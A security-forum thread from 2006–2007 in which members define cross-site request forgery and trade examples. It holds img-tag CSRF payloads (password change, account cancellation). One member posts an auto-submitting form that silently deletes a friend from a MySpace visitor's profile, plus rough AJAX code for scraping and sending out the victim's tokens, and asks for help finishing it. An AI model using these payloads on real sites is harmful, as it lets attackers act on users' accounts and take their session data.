Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A on cross site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For Session, fixations, hijacking, lockout, replay, session riding etc.... 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
CSRF
Posted by: jeremy02
Date: December 24, 2006 01:15PM

Hey, all, I'm new here. I registered to ask questions since I no longer can at HTS because Nea hates me.


Anyways, what, exactly is CSRF? Isn't it something like using images that aren't actually images to cause a person to perform an action accidentally? Something like what is below?


<img src="http://www.site.com/logout.php?logout=yes">

Options: ReplyQuote
Re: CSRF
Posted by: WhiteAcid
Date: December 24, 2006 02:02PM

As for the Nea issue. I've found her to be a fair mod, but if you have an issue bring it up with nyko or myself and we'll look into it. If you could provide specific instances of where you think she's unfair then that'd help.

As for CSRF have a look at http://en.wikipedia.org/wiki/CSRF and http://blogs.securiteam.com/index.php/archives/192

It's not specific to image. It's creating a request to another site which causes something the user doesn't want. That logout link you posted is an example, but a pretty trivial. Imagine doing <img src="http://www.example.com/user_act.php?action=change_password&pw=snowwhite" />. Or imagine <img src="http://www.example.com/user_act.php?action=cancel_account" />

As for the exact difference between this and XSS, the line is blurred. The terms need to be re-created.

Oh, and welcome :)

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer



Edited 3 time(s). Last edit at 12/24/2006 02:09PM by WhiteAcid.

Options: ReplyQuote
Re: CSRF
Posted by: maluc
Date: December 24, 2006 02:11PM

Edit: WhiteAcid already answered it.

Here's another good whitepaper on it http://www.isecpartners.com/files/XSRF_Paper_0.pdf (although they call it XSRF, which hasn't really caught on)

and.. i think the differences between CSRF and XSS are pretty clear cut - but they do often require each other, to make a viable exploit.

-maluc



Edited 1 time(s). Last edit at 12/24/2006 02:22PM by maluc.

Options: ReplyQuote
Re: CSRF
Posted by: jeremy02
Date: December 24, 2006 03:54PM

Very informitive posts from both of you. Thanks.


As far as the Nea thing goes, she warned be once because I asked a question about a dedicated server in the off topic section instead of the "nzone" hardware section, and another time because in a thread about some kid committing suicide, I wrote that anyone that considers suicide deserve to die anyways. If OI remember correctly, you commented back with a humorous, "I think they're banking on that", or something along those lines. However, she felt the need to warn me.


That's really the only two I can think of off hand.

Options: ReplyQuote
Re: CSRF
Posted by: WhiteAcid
Date: December 24, 2006 04:02PM

Maluc, I suppose they are defined, but often you'd use both, as you say. So, explaining just one doesn't quite work. I guess I wasn't thinking straight.

Jermery, sent you a pm as not everyone cares about your warnings on another site.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: CSRF
Posted by: rsnake
Date: December 24, 2006 04:32PM

For shizzle. You are more than welcome to ask your questions here, but keep the banter about who hates who to PM. The last thing I want is this to degrade into a social forum.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: CSRF
Posted by: kirke
Date: January 05, 2007 11:16AM

CSRF and XSS have nothing to do with each other.
Well, it may be that CSRF is simpler to do if you have an XSS somewhere, but they're not related in the functionality.
It's a common confusion that CSRF (aka XSRF) is compared with XSS. XSS is more a "static" data validation problem, while CSRF most likely is one of the application's logic.

Before CSRF became popular, the terms Web trojan and Client-Side Trojan are also used (I guess first by Sverre Huseby). IMHO these terms describe better what's going on.
I personally prefer Session riding in most cases, 'cause that describes that it is a session (logic) problem, not one of data validation, in particular if there is a session id in use, somehow (wether cookie or basic auth).

Options: ReplyQuote
Re: CSRF
Posted by: rsnake
Date: January 12, 2007 01:37PM

I don't know why but I've always thought that these naming issues were completely pedantic. XSS for instance is just about the worst named acronym I can think of, as it completely fails to describe the nature of the attack in many ways. I don't really care what the name is, as long as we all know what we are talking about, and in both the cases of CSRF/Session Riding (I'm open to using either) and XSS I think everyone understands what we are talking about.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: CSRF
Posted by: eyeced
Date: January 16, 2007 05:48PM

Im really interested in CSRF, although this forum isnt as active as the XSS related ones, i'd be interested to read any CSRF exploits in sites that people have found, in sort of a So it begins thread for CSRF as im sure many other people would. So if any CSRF 'exploits' are found in websites i hope people will share and discuss, i have a dream that one day CSRF will be discussed as much as XSS...

Well maybe im not that passionate about it, but i like to know as much as i can about as many different areas of security, and as im relatively new to CSRF im quite hungry for real world uses and general examples...

Options: ReplyQuote
Re: CSRF
Posted by: rsnake
Date: January 16, 2007 09:14PM

I built a real-world example during a penetration test, to prove that I could force a user to change their email address to whatever I want. That combined with other issues in the site gave me complete access to the user's account and worse.

I'm interested in CSRF, but it's far less complex topic than XSS which is why I think we tend to talk about it a little less. Do you have any particular questions to spark some conversations?

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: CSRF
Posted by: eyeced
Date: January 17, 2007 08:42AM

Im not sure whether i agree or not with the complexity of the two being more for XSS, on a basic level for example <img src=domain.com/password.php?newpass=omghaxed> then yeah i would agree XSS is far more complex than this, but CSRF requires alot more thought on CAPTCHA evasion or randomly generated hashs etc.. I think they both have simple levels to them, but thinking out of the box and taking it beyond the obvious methods is what defines the complexity of either method. Anyway yes, I do have a particular question as of 5minutes ago, i was reading the 'Fun ideas for a myspace worm thread' and somebody mentioned deleting tom from there friends list, i don't mean to pick on myspace, but its a very large site with fairly good security in mind so i chose this, anyway, i made some code to automatically delete tom from the users profile upon viewing, the trouble is some variables that need to be used, I wouldnt say im the most clued up person in AJAX although i have had a browse, anyway, my code was

<form name="PageForm" action="index.cfm" method="get">
<input type="Hidden" name="fuseaction" value="user.editfriends">
<input type="hidden" name="friendID" value="YOURIDHERE">
<input type="hidden" name="page" value="">
<input type=hidden name=Mytoken value=YOURTOKENHERE>
</form>

<form action="http://collect.myspace.com/index.cfm?fuseaction=user.deleteFriend&page=0" method="post" name="friendsDelete" id="friendsDelete">
<input type="hidden" name="hash" value="YOURHASHHERE">
<input type=hidden name=Mytoken value=YOURTOKEN>
<input type="checkbox" name="delFriendID" value="6221" checked>
</form>
<script>
document.friendsDelete.submit()
</script>
</body></html>

As you can see there are only 3 different variables that effect the ability of this page to automatically delete a friend from the users list Mytoken, HASH, and your friend ID, i was thinking of using AJAX for this, could anyone give me pointers, or possible code examples for implementing this.

I was thinking of testing this with

<script>
var friendid=encodeURIComponent(findContents(oXML,'friendid=','&MyToken=',9));
</script>

or

<script>
var start = html.indexOf('friendID') + 17;
var end = html.indexOf('"',start);
var id = html.slice(start,end);
</script> --from a maluc example

Then calling the friendid as an alert to test it but it didnt work...

This is killing me...please help.



Edited 1 time(s). Last edit at 01/17/2007 09:25AM by eyeced.

Options: ReplyQuote
Re: CSRF
Posted by: eyeced
Date: January 17, 2007 04:11PM

I no iv double posted but i didnt wana confuse people by adding more to what iv already put and to let them know that i have came back to this after more thought.
For actual use of this, being able to delete tom automatically where would the code go, i mean it'd have to be placed on the page where the hash, token, and friendID of the victim are all present...

Anyway, if anyone still has an answer to the AJAX issues i am facing, please let me no just out of curiosity.

Okay another idea was to use the ajax to send the different variables to a php script on my server which would then log them nicely into a text file, but when i tried this i sniffed the connection to see if anything was happening and i got a request for crossdomain.xml so im guessing there are policies on this sort of this happening. So then i thought i could just PM the variables to my self on myspace, but by this point im way out of my depth, throwing sloppy code together just trying to put my ideas across. To which i came up with this...

var doEdit=function(oXML){

var friendid=encodeURIComponent(findContents(oXML,'friendid=','&MyToken=',9));

if(friendid){
var thehash = encodeURIComponent(findContents(oXML,'editInterests_hash','\" />', 27));
if('%22%20maxleng' == headlinetext) {
headlinetext = '';

}

}
};

var XMLHTTPRequestObject = false;
if (window.XMLHttpRequest)
{
XMLHttpRequestObject = new XMLHttpRequest();
}
else (window.ActiveXObject)
{
XMLHttpRequestObject = new ActiveXObject("Microsoft.XMLHTTP");
}

function socket()
{
string?
XMLHttpRequestObject.open('GET', 'http://messaging.myspace.com/index.cfm?fuseaction=mail.message&friendID=+friendid+&MyToken=+token&message=+thehash', true);
XMLHttpRequestObject.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
XMLHttpRequestObject.send(null);
delete XMLHttpRequestObject;
}
window.document.onload='socket();'

Take not the messaging url for myspace is just an example (obviously), what im trying to show is a way of bypassing the crossdomain policy to be able to PM yourself or post on your blog or anything information about the user that has visited your profile, such as the hash, friendID and tokens etc... this is all going quite mad at the moment, i appreciate there is alot to read...so i await your feedback people.



Edited 1 time(s). Last edit at 01/17/2007 06:46PM by eyeced.

Options: ReplyQuote
Re: CSRF
Posted by: rsnake
Date: January 17, 2007 06:45PM

Hmmm... I'm not sure I'd agree with your disagreement. :) CAPTCHAs, and randomly generated hashes can affect XSS as well. Those I think are very separate issues and should be considered separate as to not confuse the actual issue. CAPTCHAs and tokens can be put anywhere, including the front page of the website, preventing anything, including SQL attacks, PHP includes, the works. Very different.

Anyway...

I wish I could help with the MySpace thing, but I've long since deleted my MySpace account after some blonde real estate agent started stalking me using it. Creepy.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: CSRF
Posted by: eyeced
Date: January 17, 2007 06:48PM

Okay, so now i have 2 massive posts on my possible AJAX attacks, ill just leave the more AJAX knowledge'd members to pull it apart and give me advice... or at least i hope.

Thanks in advance.

Options: ReplyQuote


Sorry, only registered users may post in this forum.